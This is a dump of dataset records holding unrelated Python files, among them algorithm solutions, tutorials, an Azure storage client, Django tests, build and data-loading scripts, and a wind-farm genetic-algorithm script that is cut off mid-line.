r\n","sub_path":"programs/pyeos/tests/lua/hello/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"311103311","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def insertIntoMaxTree(self, root: TreeNode, val: int) -> TreeNode:\n newNode = TreeNode(val)\n if val > root.val:\n newNode.left = root\n return newNode\n self.insertHelper(root.right, root, newNode)\n return root\n\n def insertHelper(self, node, parent, newNode):\n if not node:\n parent.right = newNode\n return\n if newNode.val > node.val:\n parent.right = newNode\n newNode.left = node\n return\n self.insertHelper(node.right, node, newNode)\n","sub_path":"src/maximum-binary-tree-ii.py","file_name":"maximum-binary-tree-ii.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498088074","text":"# Dictionary\n# ==============================\n# Dictionary is a bag of values, each with its own label, whereas List is a linear collection of values\n# that stay in order.\n# Dictionary are like bags - no order. So we index the things we put in the dictionary with a \"lookup tag\".\n\npurse = dict()\npurse['money'] = 12\npurse['candy'] = 3\npurse['tissues'] = 75\nprint(purse) # {'money': 12, 'candy': 3, 'tissues': 75}\nprint(purse['candy']) # 3\npurse['candy'] = purse['candy'] + 2\nprint(purse) # {'money': 12, 'candy': 5, 'tissues': 75}\n\n\n# Comparing Lists and Dictionaries\n# ================================\n# Dictionaries are like lists except that they use keys instead of numbers to look up values.\n\nlst = list()\nlst.append(21)\nlst.append(183)\nprint(lst) # [21, 183]\nlst[0] = 23\nprint(lst) # [23, 183]\n\nddd = dict()\nddd['age'] = 21\nddd['course'] = 182\nprint(ddd) # {'age': 21, 'course': 182}\nddd['age'] = 23\nprint(ddd) # {'age': 23, 'course': 182}\n\n\n# Dictionary Literals (Constants)\n# ================================\n# Dictionary literals use curly braces and have a list of key: value pairs.\n# You can make an empty dictionary using empty curly braces.\n\njjj = {'chuck': 1, 'fred': 42, 'jan': 100}\nprint(jjj) # {'chuck': 1, 'fred': 42, 'jan': 100}\nooo = {}\nprint(ooo) # {}","sub_path":"02. Data Structures/20_Dictionaries.py","file_name":"20_Dictionaries.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280743414","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nfrom typing import ( # pylint: disable=unused-import\n Union, Optional, Any, Iterable, Dict, List, Type, Tuple,\n TYPE_CHECKING\n)\nimport logging\n\nfrom azure.core.pipeline import AsyncPipeline\nfrom azure.core.exceptions import HttpResponseError\nfrom azure.core.pipeline.policies import (\n ContentDecodePolicy,\n AsyncBearerTokenCredentialPolicy,\n AsyncRedirectPolicy,\n DistributedTracingPolicy\n)\n\nfrom .constants import STORAGE_OAUTH_SCOPE, DEFAULT_SOCKET_TIMEOUT\nfrom .authentication import SharedKeyCredentialPolicy\nfrom .base_client import create_configuration\nfrom .policies import (\n StorageContentValidation,\n StorageRequestHook,\n StorageHosts,\n StorageHeadersPolicy,\n QueueMessagePolicy)\nfrom .policies_async import AsyncStorageResponseHook\n\nfrom .._generated.models import StorageErrorException\nfrom .response_handlers import process_storage_error\n\nif TYPE_CHECKING:\n from azure.core.pipeline import Pipeline\n from azure.core.configuration import Configuration\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AsyncStorageAccountHostsMixin(object):\n\n def __enter__(self):\n raise TypeError(\"Async client only supports 'async with'.\")\n\n def __exit__(self, *args):\n pass\n\n async def __aenter__(self):\n await self._client.__aenter__()\n return self\n\n async def __aexit__(self, *args):\n await self._client.__aexit__(*args)\n\n def _create_pipeline(self, credential, **kwargs):\n # type: (Any, **Any) -> Tuple[Configuration, Pipeline]\n self._credential_policy = None\n if hasattr(credential, 'get_token'):\n self._credential_policy = AsyncBearerTokenCredentialPolicy(credential, STORAGE_OAUTH_SCOPE)\n elif isinstance(credential, SharedKeyCredentialPolicy):\n self._credential_policy = credential\n elif credential is not None:\n raise TypeError(\"Unsupported credential: {}\".format(credential))\n config = kwargs.get('_configuration') or create_configuration(**kwargs)\n if kwargs.get('_pipeline'):\n return config, kwargs['_pipeline']\n config.transport = kwargs.get('transport') # type: ignore\n if 'connection_timeout' not in kwargs:\n kwargs['connection_timeout'] = DEFAULT_SOCKET_TIMEOUT[0] # type: ignore\n if not config.transport:\n try:\n from azure.core.pipeline.transport import AioHttpTransport\n except ImportError:\n raise ImportError(\"Unable to create async transport. 
Please check aiohttp is installed.\")\n config.transport = AioHttpTransport(**kwargs)\n policies = [\n QueueMessagePolicy(),\n config.headers_policy,\n config.user_agent_policy,\n StorageContentValidation(),\n StorageRequestHook(**kwargs),\n self._credential_policy,\n ContentDecodePolicy(),\n AsyncRedirectPolicy(**kwargs),\n StorageHosts(hosts=self._hosts, **kwargs), # type: ignore\n config.retry_policy,\n config.logging_policy,\n AsyncStorageResponseHook(**kwargs),\n DistributedTracingPolicy(),\n ]\n return config, AsyncPipeline(config.transport, policies=policies)\n\n async def _batch_send(\n self, *reqs # type: HttpRequest\n ):\n \"\"\"Given a series of request, do a Storage batch call.\n \"\"\"\n request = self._client._client.post( # pylint: disable=protected-access\n url='https://{}/?comp=batch'.format(self.primary_hostname),\n headers={\n 'x-ms-version': self._client._config.version # pylint: disable=protected-access\n }\n )\n\n request.set_multipart_mixed(\n *reqs,\n policies=[\n StorageHeadersPolicy(),\n self._credential_policy\n ]\n )\n\n pipeline_response = await self._pipeline.run(\n request,\n )\n response = pipeline_response.http_response\n\n try:\n if response.status_code not in [202]:\n raise HttpResponseError(response=response)\n return response.parts() # Return an AsyncIterator\n except StorageErrorException as error:\n process_storage_error(error)\n","sub_path":"sdk/storage/azure-storage-queue/azure/storage/queue/_shared/base_client_async.py","file_name":"base_client_async.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336963477","text":"import json\n\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework.views import status\n\n\nclass TestReportArticle(APITestCase):\n \"\"\"\n Class tests for rating article.\n \"\"\"\n client = APIClient()\n\n def setUp(self):\n \"\"\" Creates user and article for testing\"\"\"\n self.article = {\n \"title\": \"epic\",\n \"description\": \"sdsd\",\n \"body\": \"dsd\",\n \"images\": \"\"\n }\n self.user = {\n \"user\": {\n \"email\": \"winniekariuki07@gmail.com\",\n \"username\": \"Winnie\",\n \"password\": \"Winnie07\"\n }\n }\n self.user_1 = {\n \"user\": {\n \"email\": \"julietkariuki07@gmail.com\",\n \"username\": \"Juliet\",\n \"password\": \"Juliet07\"\n }\n }\n self.admin = {\n \"user\": {\n \"email\": \"andelaolympians@andela.com\",\n \"username\": \"andela\",\n \"password\": \"Kariuki07\"\n }\n }\n \n self.report = {\n\t \"report_message\":\"plagerism\"\n }\n \n\n create_user = self.client.post(\n '/api/users/', self.user, format='json')\n\n create_user_1 = self.client.post(\n '/api/users/', self.user_1, format='json')\n create_admin = self.client.post(\n '/api/users/', self.admin, format='json')\n \n \n self.request_tkn = self.client.post(\n '/api/users/login/', self.user, format='json')\n token_request = json.loads(self.request_tkn.content)\n self.token = token_request[\"user\"][\"token\"]\n\n self.request_tkn_1= self.client.post(\n '/api/users/login/', self.user_1, format='json')\n token_request_1 = json.loads(self.request_tkn_1.content)\n self.token_1 = token_request_1[\"user\"][\"token\"]\n\n self.request_tkn_admin= self.client.post(\n '/api/users/login/', self.admin, format='json')\n token_request_admin= json.loads(self.request_tkn_admin.content)\n self.token_admin = token_request_admin[\"user\"][\"token\"]\n\n create_profile = self.client.post('/api/profile/create_profile/', self.user,\n 
HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n\n create_profile = self.client.post('/api/profile/create_profile/', self.user_1,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n\n create_article = self.client.post('/api/articles/', self.article,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n def test_successful_report(self):\n \"\"\"Test reporting of an article \n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"Your report has been sent successfully to the admin \")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_report_of_article_does_not_exist(self):\n \"\"\"Test reporting of an article that does not exist\n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n response = client.post('/api/report/spoon/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"error_message\"], \"The article you are reporting does not exist\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_reporting_your_own_article(self):\n \"\"\"Test reporting your own article\n \n \"\"\"\n \n response = self.client.post('/api/articles/', self.article,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n result = json.loads(response.content)\n \n response = self.client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n result = json.loads(response.content)\n \n self.assertEqual(result[\"errors\"], \"You cannot report your own article\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_report_article_more_than_once(self):\n \"\"\"Test reporting of an article \n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result['errors'],'You can only report an article once')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n \n def test_get_all_reports(self):\n \"\"\"\n Test getting of all reports\n \n \"\"\" \n from rest_framework.test import APIClient\n client = APIClient()\n \n response = self.client.get('/api/reports/',\n HTTP_AUTHORIZATION='Token ' + self.token_admin,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"You have no permissions\")\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_get_single_report(self):\n \"\"\"\n Test getting of single report\n \n \"\"\" \n from rest_framework.test import APIClient\n client = APIClient()\n \n response = self.client.get('/api/reports/epic/',\n HTTP_AUTHORIZATION='Token ' + self.token_admin,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"You have no permissions\")\n self.assertEqual(response.status_code, 
status.HTTP_401_UNAUTHORIZED)\n","sub_path":"authors/apps/article/tests/test_report_article.py","file_name":"test_report_article.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"362455093","text":"\"\"\"Exercise 10: Write the function comparar(a,b)\r\nthat takes two integers as parameters and\r\nreturns 1 if the first is greater than the second,\r\n0 if they are equal, or -1 if the first is less than the second.\r\nExample: comparar(4,2) returns 1, and comparar(2,4) returns -1.\"\"\"\r\n\r\ndef comparar(a,b):\r\n    if a>b:\r\n        n=\"1\"\r\n    else:\r\n        if a<b:\r\n            n=\"-1\"\r\n        else:\r\n            n=\"0\"\r\n    return n\r\n\n\nimport sys\nimport os\nimport os.path\nimport shutil\nimport time\nimport commands\nimport traceback\nimport glob\nimport threading\nimport time\nimport logging\nimport subprocess\nfrom optparse import OptionParser\n\nSCRIPT_PATH = os.path.realpath(__file__)\nConstPath = os.path.dirname(SCRIPT_PATH)\n\nLOG = None\nLOG_LEVEL = logging.DEBUG\nBUILD_TIME = time.strftime('%Y%m%d', time.localtime(time.time()))\nDEFAULT_CMD_TIMEOUT = 1200\n#RES_STDICT = {\"positive\":0,\"negative\":1}\nRESULT_DIR = os.path.join(ConstPath, \"apks\")\nMAX_RUNNING_THREAD_NUM = 12\n\n\nclass ColorFormatter(logging.Formatter):\n\n    def __init__(self, msg):\n        logging.Formatter.__init__(self, msg)\n\n    def format(self, record):\n        red, green, yellow, blue = range(4)\n        colors = {'INFO': green, 'DEBUG': blue,\n                  'WARNING': yellow, 'ERROR': red}\n        msg = record.msg\n        if msg[0] == \"+\":\n            msg = \"\\33[01m\" + msg[1:] + \"\\033[0m\"\n        elif msg[0] == \"=\":\n            msg = \"\\33[07m\" + msg + \"\\033[0m\"\n        levelname = record.levelname\n        if levelname in colors:\n            msg_color = \"\\033[0;%dm\" % (\n                31 + colors[levelname]) + msg + \"\\033[0m\"\n            record.msg = msg_color\n\n        return logging.Formatter.format(self, record)\n\n\ndef doCMDWithOutput(cmd, time_out=DEFAULT_CMD_TIMEOUT):\n    LOG.info(\"Doing CMD: [ %s ]\" % cmd)\n    pre_time = time.time()\n    output = []\n    cmd_return_code = 1\n    cmd_proc = subprocess.Popen(\n        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n\n    while True:\n        output_line = cmd_proc.stdout.readline().strip(\"\\r\\n\")\n        cmd_return_code = cmd_proc.poll()\n        elapsed_time = time.time() - pre_time\n        if cmd_return_code is None:\n            if elapsed_time >= time_out:\n                killProcesses(ppid=cmd_proc.pid)\n                LOG.error(\"Timeout to exe CMD\")\n                # return a nonzero status so callers unpacking (status, output) see the timeout as a failure\n                return (1, output)\n        elif output_line == '' and cmd_return_code is not None:\n            break\n\n        sys.stdout.write(\"%s\\n\" % output_line)\n        sys.stdout.flush()\n        output.append(output_line)\n    if cmd_return_code != 0:\n        LOG.error(\"Fail to exe CMD\")\n\n    return (cmd_return_code, output)\n\n\ndef init_env(arch_arg):\n\n    global RES_FILE\n    global RES_ARCH_DIR\n\n    RES_ARCH_DIR = os.path.join(RESULT_DIR, arch_arg)\n    RES_FILE = os.path.join(RESULT_DIR, arch_arg, \"Pkg_result.txt\")\n\n    if os.path.exists(RES_ARCH_DIR):\n        shutil.rmtree(RES_ARCH_DIR)\n\n    os.makedirs(RES_ARCH_DIR)\n    os.mknod(RES_FILE)\n\n\ndef ge_apks(suite_dir, arch_arg, res_arch_dir):\n\n    if max_num.acquire():\n\n        suite_name = suite_dir.split('/')[-1]\n        suitename_without_flag = suite_name.split('-')[0]\n        flag = suite_name.split('-')[-1]\n\n        cmd = \"python \" + os.path.join(\n            BUILD_PARAMETERS.pkgpacktools,\n            'crosswalk',\n            'make_apk.py') + \" --package=org.xwalk.test --app-versionCode=123 --arch=\" + arch_arg + \" --manifest=\"\n        manifest_path = os.path.join(suite_dir, \"manifest.json\")\n        res_suite_dir = os.path.join(res_arch_dir, suite_name)\n\n        if not os.path.exists(manifest_path):\n
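            # a suite without a manifest cannot be packed; record the failure and skip it\n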
LOG.error(\"%s not exists !!!\" % manifest_path)\n ores_file.write(\n suitename_without_flag +\n \"\\t\" +\n flag +\n \"\\t\" +\n \"Manifest not exists !!!\" +\n \"\\n\")\n return\n if os.path.exists(res_suite_dir):\n shutil.rmtree(res_suite_dir)\n os.makedirs(res_suite_dir)\n\n os.chdir(res_suite_dir)\n\n status, info = doCMDWithOutput(cmd + manifest_path)\n\n if (status == 0 and flag == 'positive') or (\n status != 0 and flag == 'negative'):\n result = \"PASS\"\n else:\n result = \"FAIL\"\n\n if status != 0:\n shutil.rmtree(res_suite_dir)\n\n ores_file.write(\n suite_name +\n \"\\t\" +\n flag +\n \"\\t\" +\n result +\n \"\\n\")\n\n if result == \"PASS\":\n LOG.info(\n \"Built Done: [ %s %s %s %s ] !!! \" %\n (suitename_without_flag, flag, result, status))\n else:\n LOG.error(\n \"Built Done: [ %s %s %s %s ] !!! \" %\n (suitename_without_flag, flag, result, status))\n\n #if threading.activeCount() >= MAX_RUNNING_THREAD_NUM:\n max_num.release()\n\n\nif __name__ == \"__main__\":\n\n #global LOG\n LOG = logging.getLogger(\"pack-tool\")\n LOG.setLevel(LOG_LEVEL)\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(LOG_LEVEL)\n stream_formatter = ColorFormatter(\"[%(asctime)s] %(message)s\")\n stream_handler.setFormatter(stream_formatter)\n LOG.addHandler(stream_handler)\n pack_threads = []\n global max_num\n global ores_file\n\n try:\n usage = \"Usage: ./gen_apks -a x86 --tools=\"\n opts_parser = OptionParser(usage=usage)\n opts_parser.add_option(\n \"-a\",\n \"--arch\",\n dest=\"pkgarch\",\n help=\"specify the apk arch, e.g. x86, arm\")\n opts_parser.add_option(\n \"--tools\",\n dest=\"pkgpacktools\",\n help=\"specify the parent folder of pack tools\")\n\n if len(sys.argv) == 1:\n sys.argv.append(\"-h\")\n\n global BUILD_PARAMETERS\n (BUILD_PARAMETERS, args) = opts_parser.parse_args()\n except Exception as e:\n LOG.error(\"Got wrong options: %s, exit ...\" % e)\n sys.exit(1)\n\n if not BUILD_PARAMETERS.pkgarch:\n BUILD_PARAMETERS.pkgarch = \"x86\"\n\n if not BUILD_PARAMETERS.pkgpacktools:\n BUILD_PARAMETERS.pkgpacktools = os.path.join(\n ConstPath, \"..\", \"..\", \"tools\")\n BUILD_PARAMETERS.pkgpacktools = os.path.expanduser(\n BUILD_PARAMETERS.pkgpacktools)\n\n init_env(BUILD_PARAMETERS.pkgarch)\n\n ores_file = open(RES_FILE, 'w')\n\n max_num = threading.Semaphore(MAX_RUNNING_THREAD_NUM)\n for suite in os.listdir(os.path.join(ConstPath, 'tcs')):\n suite_abspath = os.path.join(ConstPath, 'tcs', suite)\n pack_threads.append(\n threading.Thread(\n target=ge_apks,\n args=(\n suite_abspath,\n BUILD_PARAMETERS.pkgarch,\n RES_ARCH_DIR)))\n\n for sthread in pack_threads:\n # if max_num.acquire():\n #sthread.daemon = True\n time.sleep(2)\n sthread.start()\n # if len(threading.enumerate()) < 3:\n # max_num.release()\n\n for sthread in pack_threads:\n sthread.join()\n\n ores_file.flush()\n ores_file.close()\n","sub_path":"wrt/wrt-manifest-android-tests/gen_apks.py","file_name":"gen_apks.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"271113799","text":"import pandas as pd\nimport numpy as np\n\nMNLI_PATH = \"/home/ndg/users/jkurre/mnli/utils/multinli_1.0_dev_mismatched.jsonl\"\nGLOVE_PATH = \"/home/ndg/users/jkurre/mnli/utils/embeddings/glove.6B.50d.txt\"\nLABEL_TO_INT = {'contradiction':1, 'entailment':2, 'neutral':3}\n\ndef load_mnli():\n # read data to pandas dataframe \n mnli_data = pd.read_json(MNLI_PATH, lines=True)\n # combine pairs and map labels to ids\n 
mnli_data[\"sentence\"] = mnli_data[\"sentence1\"] + \"\" + mnli_data[\"sentence2\"]\n mnli_data[\"gold_label\"] = mnli_data[\"gold_label\"].apply(lambda label: LABEL_TO_INT[label])\n # split data into train, validation, and test set\n train, validate, test = np.split(\n mnli_data.sample(frac=1), [int(.6*len(mnli_data)),int(.8*len(mnli_data))]\n )\n # export to csv and return train, validation, and test set\n train.to_csv(\"train.csv\")\n validate.to_csv(\"val.csv\")\n test.to_csv(\"test.csv\")\n return train, validate, test\n\ndef load_glove(vocabulary):\n \"\"\"\n Wikipedia 2014 + Gigaword 5 vectors\n https://nlp.stanford.edu/projects/glove/\n \"\"\"\n embeddings = {}\n \n with open(GLOVE_PATH, 'r', encoding=\"utf-8\") as f:\n for line in f:\n values = line.split()\n word, vector = values[0], np.asarray(values[1:], \"float32\")\n if word in vocabulary:\n embeddings[word] = vector\n return embeddings\n\nif __name__ == \"__main__\":\n load_mnli()","sub_path":"utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323589578","text":"import os\nimport requests\n\nclass cameras:\n def __init__(self,hpwrenUrl):\n self.hpwrenUrl = hpwrenUrl\n self.requestData = requests.get(self.hpwrenUrl)\n self.hpwrenCams = self.requestData.json()\n\n def getImageURL(self, cameraID=0,siteID=0):\n hpwrenCams = self.hpwrenCams\n hpwrenCamsF = hpwrenCams[\"features\"]\n hpwrenCamsAtSite = hpwrenCamsF[siteID][\"properties\"][\"latest-images\"]\n imageURL = hpwrenCamsAtSite[cameraID][0][\"image\"]\n description = hpwrenCamsAtSite[cameraID][0][\"description\"]\n return imageURL,description\n","sub_path":"plugin-smokedetect/src/hpwren.py","file_name":"hpwren.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"266784715","text":"import argparse\nimport os\nfrom wdata_config.loggers import create_info_log as create_info_log\n\n\nlogger = create_info_log(__name__)\n\n\n# function to handle direct call from terminal with argparse\ndef parsing_to_api():\n directory = os.getcwd()\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--task', '-t',\n help='options: category data with -d category, or videos data with -v videos',\n type=str,\n nargs=1,\n default='trends'\n )\n parser.add_argument(\n '--category', '-ct',\n help='category which the API will bring data. Ex: -c 3',\n type=int,\n nargs=1,\n default=0\n )\n parser.add_argument(\n '--country', '-c',\n help=\"the ISO 3166-1 Alpha 2 country code which the API will bring data. 
Ex: BR\",\n type=str,\n nargs=1,\n default=\"BR\"\n )\n parser.add_argument(\n '--output_dir', '-o',\n help='Path to save the outputted files in',\n type=str,\n nargs=1,\n default=f'{directory}\\a_data_processing\\output\\YouTube'\n )\n parser.add_argument(\n '--name', '-n',\n help='optional file name which the data will be written',\n type=str,\n nargs=1,\n default='standard'\n )\n parser.add_argument(\n '--routine', '-r',\n help='basically, use to mark if the call is a routine programmed',\n type=str,\n nargs=1,\n default='No'\n )\n args = parser.parse_args()\n \n # the reason to parse argparse as keywords it's because not always this API will be called from terminal\n \n return{\n \"task\": args.task,\n \"category\": args.category,\n \"country\": args.country,\n \"name\": args.name,\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":args.routine\n }\n\n \n# this here is for when WData is called first from terminal\ndef construct():\n directory = os.getcwd()\n logger.info(\"Starting YouTube API construct\")\n print(\"Follow these instructions to use YouTube API\")\n \n print(\"Which task will the API use? Choose a character:\")\n print(\"[t] - trends videos information\")\n print(\"[c] - categories' list information\")\n task = input()\n\n print(\"Which country the data will be Fetch? Use ISO 3166-1 Alpha 2 code\")\n country = input()\n\n if task == \"t\":\n task = \"trends\"\n print(\"Which category of videos will the API fetch? Choose a number:\")\n print(\"\\t [0] - All\\n\"\n \"\\t [10] - Music \\n\"\n \"\\t [20] - Gaming \\n\"\n \"\\t [25] - News & Politics\")\n category = int(input())\n logger.info(f\"Starting process on {task}, category {category} for country {country}\")\n \n return{\n \"task\": task,\n \"category\": category,\n \"country\": country,\n \"name\": \"standard\",\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":'No'\n }\n else:\n task = \"categories\"\n \n return{\n \"task\": task,\n \"country\": country,\n \"name\": \"standard\",\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":'No'\n }","sub_path":"a_data_processing/YouTube/config/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116915944","text":"import asyncio\nimport os\nimport shutil\nfrom unittest import mock\n\nimport pytest\nfrom aiohttp.test_utils import TestClient\nfrom aiohttp.web import Application\nfrom sqlalchemy.engine.url import URL\nfrom sqlalchemy_utils import create_database, database_exists\n\nfrom openapi.db.dbmodel import CrudDB\nfrom openapi.testing import app_cli, with_test_db\n\nfrom .example.db import DB\nfrom .example.main import create_app\n\n\n@pytest.fixture(scope=\"session\")\ndef sync_url() -> URL:\n return DB.sync_engine.url\n\n\n@pytest.fixture(autouse=True)\ndef clean_migrations():\n if os.path.isdir(\"migrations\"):\n shutil.rmtree(\"migrations\")\n\n\n@pytest.fixture(autouse=True)\ndef sentry_mock(mocker):\n mm = mock.MagicMock()\n mocker.patch(\"sentry_sdk.init\", mm)\n return mm\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef event_loop():\n \"\"\"Return an instance of the event loop.\"\"\"\n loop = asyncio.new_event_loop()\n try:\n yield loop\n finally:\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef clear_db(sync_url: URL) -> CrudDB:\n if not database_exists(sync_url):\n # drop_database(url)\n create_database(sync_url)\n else:\n 
DB.drop_all_schemas()\n return DB\n\n\n@pytest.fixture\nasync def cli(clear_db: CrudDB) -> TestClient:\n app = create_app().web()\n with with_test_db(app[\"db\"]):\n async with app_cli(app) as cli:\n yield cli\n\n\n@pytest.fixture(scope=\"module\")\nasync def cli2(clear_db: CrudDB) -> TestClient:\n app = create_app().web()\n with with_test_db(app[\"db\"]):\n async with app_cli(app) as cli:\n yield cli\n\n\n@pytest.fixture\ndef test_app(cli: TestClient) -> Application:\n return cli.app\n\n\n@pytest.fixture\ndef db(test_app: Application) -> CrudDB:\n return test_app[\"db\"]\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411650928","text":"import networkx as nx\nfrom networkx.readwrite import json_graph\nimport json\nfrom collections import defaultdict, deque\nfrom heapq import heappush, heappop\nfrom itertools import count\nimport threading\nfrom multiprocessing.dummy import Pool as ThreadPool\n\n\n\ndef own_DFS(graph, s, dest=0, paths=False):\n visited = set()\n\n def dfs(G, source=None):\n if source is None:\n nodes = G\n else:\n nodes = [source]\n for start in nodes:\n if start in visited:\n continue\n visited.add(start)\n stack = [(start, iter(G[start]))]\n while stack:\n parent, children = stack[-1]\n try:\n child = next(children)\n if child not in visited:\n yield parent, child\n visited.add(child)\n stack.append((child, iter(G[child])))\n except StopIteration:\n stack.pop()\n\n path = []\n edges = list(nx.dfs_edges(graph, s))\n edges.reverse()\n for x in edges:\n if x[1] == dest:\n path.append(dest)\n dest = x[0]\n path.append(s)\n path.reverse()\n return path if paths else dfs(graph, s)","sub_path":"AIProject/Alg2/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32952925","text":"import numpy as np\r\nimport pandas as pd\r\nimport MARS # MARS (Multivariate Adaptive Regression Splines) regression class\r\nimport WindFarmGeneticToolbox # wind farm layout optimization using genetic algorithms classes\r\nfrom datetime import datetime\r\nimport os\r\nimport pickle\r\n\r\n# parameters for the genetic algorithm\r\nelite_rate = 0.2\r\ncross_rate = 0.6\r\nrandom_rate = 0.5\r\nmutate_rate = 0.1\r\n\r\n# wind farm size, cells\r\nrows = 21\r\ncols = 21\r\ncell_width = 77.0 * 2 # unit : m\r\n\r\n#\r\nN = 60 # number of wind turbines\r\npop_size = 100 # population size, number of inidividuals in a population\r\niteration = 3 # number of genetic algorithm iterations\r\n\r\n# all data will be save in data folder\r\ndata_folder = \"data\"\r\nif not os.path.exists(data_folder):\r\n os.makedirs(data_folder)\r\n\r\n# create an object of WindFarmGenetic\r\nwfg = WindFarmGeneticToolbox.WindFarmGenetic(rows=rows, cols=cols, N=N, pop_size=pop_size,\r\n iteration=iteration, cell_width=cell_width, elite_rate=elite_rate,\r\n cross_rate=cross_rate, random_rate=random_rate, mutate_rate=mutate_rate)\r\n# set wind distribution\r\n# wind distribution is discrete (number of wind speeds) by (number of wind directions)\r\n# wfg.init_4_direction_1_speed_12()\r\nwfg.init_1_direction_1_N_speed_12()\r\n\r\n################################################\r\n# generate initial populations\r\n################################################\r\n\r\ninit_pops_data_folder = \"data/init_pops\"\r\nif not os.path.exists(init_pops_data_folder):\r\n 
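# every GA variant below reloads these cached populations, so all runs start from identical layouts\r\n    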
os.makedirs(init_pops_data_folder)\r\n# n_init_pops : number of initial populations\r\nn_init_pops = 60\r\nfor i in range(n_init_pops):\r\n wfg.gen_init_pop()\r\n wfg.save_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder,i))\r\n\r\n\r\n#############################################\r\n# generate wind distribution surface\r\n#############################################\r\nwds_data_folder = \"data/wds\"\r\nif not os.path.exists(wds_data_folder):\r\n os.makedirs(wds_data_folder)\r\n# mc : monte-carlo\r\nn_mc_samples = 10000\r\n\r\n# each layout is binary list and the length of the list is (rows*cols)\r\n# 1 indicates there is a wind turbine in that cell\r\n# 0 indicates there is no wind turbine in the cell\r\n# in \"mc_layout.dat\", there are 'n_mc_samples' line and each line is a layout.\r\n\r\n# generate 'n_mc_samples' layouts and save it in 'mc_layout.data' file\r\nWindFarmGeneticToolbox.LayoutGridMCGenerator.gen_mc_grid(rows=rows, cols=cols, n=n_mc_samples, N=N,\r\n lofname=\"{}/{}\".format(wds_data_folder, \"mc_layout.dat\"))\r\n# read layouts from 'mc_layout.dat' file\r\nlayouts = np.genfromtxt(\"{}/{}\".format(wds_data_folder,\"mc_layout.dat\"), delimiter=\" \", dtype=np.int32)\r\n\r\n# generate dataset to build wind farm distribution surface\r\nwfg.mc_gen_xy(rows=rows, cols=cols, layouts=layouts, n=n_mc_samples, N=N, xfname=\"{}/{}\".format(wds_data_folder, \"x.dat\"),\r\n yfname=\"{}/{}\".format(wds_data_folder, \"y.dat\"))\r\n\r\n# parameters for MARS regression method\r\nn_variables = 2\r\nn_points = rows * cols\r\nn_candidate_knots = [rows, cols]\r\nn_max_basis_functions = 100\r\nn_max_interactions = 4\r\ndifference = 1.0e-3\r\n\r\nx_original = 